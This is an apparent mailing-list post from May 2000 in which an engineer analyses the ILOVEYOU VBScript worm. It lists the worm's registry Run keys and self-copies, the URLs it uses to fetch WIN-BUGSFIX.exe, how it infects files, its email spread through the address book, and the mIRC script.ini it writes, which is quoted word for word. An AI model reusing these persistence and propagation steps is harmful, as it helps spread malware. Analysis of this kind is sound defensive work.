Put together by Morgan Sarges, one of our engineers. Regards,
-- Nathan Norman "Eschew Obfuscation" Network Engineer GPG Key ID 1024D/51F98BB7 http://home.midco.net/~nnorman/ Key fingerprint = C5F4 A147 416C E0BF AB73 8BEF F0C8 255C 51F9 8BB7
Virus Summary:
Date May 3, 2000, 820am
This script works as listed below:
It has 5 subroutines:
regruns, html, spreadtoemail, listadriv, regruns
First up some registry keys are created:
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout 0
These are associated with windows scripting host
Then, the following file copies occur:
MSKernel32.vbs, Win32DLL.vbs, LOVE-LETTER-FOR-YOU.TXT.vbs
These files are copied to wherever the windows scripting host files
live. ( I havent worked with windows scripting host)
Next, the following registry keys are created:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dir
system&"\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DL
L",dirwin&"\Win32DLL.vbs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory
Next, the following is run:
Randomize
num = Int((4 * Rnd) + 1)
Which is a random number generator that cranks out a number between
1 and 4, inclusive.
A if-else block executes, based on the number generated, and points the users
machine (via Internet Explorer) to one of the following URLs:
The URLs below, also have registry keys created, and the keys are listed
with their respective urls:
http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvs
df7679njbvYT/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hj
k4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3
Vbvg/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdj
hPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
If this file (WIN-BUGSFIX.exe) has already been pulled, the following
registry key is created:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",do
wnread&"\WIN-BUGSFIX.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:b
lank
(The end result is at this point, IE will start up with blank.htm)
Now, a list of drives is created, and all drives are scanned in the following
manner:
Any files with .vbs or .vbe extensions (visual basic scripts or exes)
are written to a list (flat text file)
Any files with .js .jse .css .wsh .sct .hta
are written to another list
Any files with .jpg .jpeg .mp2 .mp3 extensions are written to another
list.
Next, the infected system is searched for mirc32.exe, and if it is on the
system, an irc script is created, so that the next time mirc is run,
when the irc server is contacted, the script will dcc send the 3rd file list
(with jpegs and mp3s) to a channel, which listens for these lists.
The contents of the mirc script are below, in a file called script.ini
inside the mirc directory tree:
Please dont edit this script... mIRC will corrupt, if mIRC will
corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
n3=}
Now, another directory search is run based on the 3 file lists built.
Files and folders meeting the criteria above are tagged as infected.
Next, the email propogation begins. Any program that can make use
of the following registry keys will be checked for address books:
HKEY_CURRENT_USER\Software\Microsoft\WAB\
A temporary address list is created, with a counter
The new email message is formatted and the attachment is hooked up
and the email is dumped to a server.
Once this occurs, the following registry keys are written:
HKEY_CURRENT_USER\Software\Microsoft\WAB\
under this key, there will be a DWORD with a value of 1,
and address entry count
If, a user gets to messing with the attachement, the attachment will
ask the user to click on a button to enable AcitveX controls.
If this is successful, the files copied initially, MSKernel32.vbs
may be run.
This is by no means a complete summary.
Ill try to send more info as I dig into the EXE's that are pulled
from the web urls listed above.
Morgan
pgpU0L0Qeh4YZ.pgp
Description: PGP signature
